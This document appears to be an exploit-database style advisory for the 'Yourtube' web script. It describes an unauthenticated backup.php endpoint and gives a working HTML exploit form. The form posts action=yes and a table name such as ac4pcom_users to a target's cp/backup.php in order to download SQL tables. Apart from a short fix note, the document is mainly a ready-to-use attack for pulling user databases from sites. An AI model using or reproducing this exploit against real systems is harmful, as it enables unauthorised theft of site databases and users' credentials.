- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Exploit Title : Yourtube Sql table download vuln
| Auther        : Eg-R1z
| Home          : black-hat.cc , sec4ever.com
| contact       : Get me @ the above sites > i-Hmx
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| script name    : Yourtube
| version        : 1.0 , 2.0 don't know abt v3 but it's maybe affected also
| Dork           : just find ur own one
| Vulnerability  : due to stupid confirmation rule on cp/backup.php file
| Quick sollution:-
| Coder rule : Applying strong login confirmation rule on backup.php file
| User rule  : firewall on the cp directory seem 2 B enough
|            > Update to newer version < v4 is preferred >
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 - - - - - - - - - - - - - - - - - - Exploit Code <html> - - - - - - - - - - - - - - - - - - - -
<html dir="rtl">
<head>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
	color: #0000FF;
	font-weight: bold;
}
-->
</style>
<title>YourTube Sql tables Download Exploit - HaCKeR-MaN</title><div>
</TD></TR>
</TABLE>
      </td>
      <td width="100%" height="327" align="center" valign="top">
<TABLE align="center" dir="ltr"  WIDTH=97% BORDER=0 CELLPADDING=0 CELLSPACING=0 height="23">
        <TR>
                <TD dir="rtl"  bgcolor="#FFFFFF" align="center" valign="top" height="19" width="959">
<div align="center">
  <form name="a" action=""
 method="post" name="formw" onsubmit="document.a.action = document.a.site.value+'/backup.php';document.a.submit">
</div>
<p align="center"><strong>YourTube Sql tables Download Exploit</strong></p>
<p align="center"><strong>Coded By <span class="style1">HaCKeR-MaN</span></strong></p>
<p align="center"><strong>Black-hat.cc , sec4ever.com </strong></p>
<p align="center" class="style2">Target Url </p>
<p align="center">
  <input name="action" type="hidden" value="yes">
  <input name="site" type="text" value="http://target/path/cp" size="35" align="left">
</p>
<p align="center" class="style2">Table name </p>
<p align="center">
  <input type="text" name="tablen[]" value="ac4pcom_users" size=35 />
  </p>
<p align="center"><br>
  <input type="submit" name="submit2" class="buttons" value="Get it" />
  </form>
</p></TD></TR>
</td>
    </tr>
  </center>
</div>
</body>
</html>

 - - - - - - - - - - - - - - - - - - End of the shit - - - - - - - - - - - - - - - - - - - -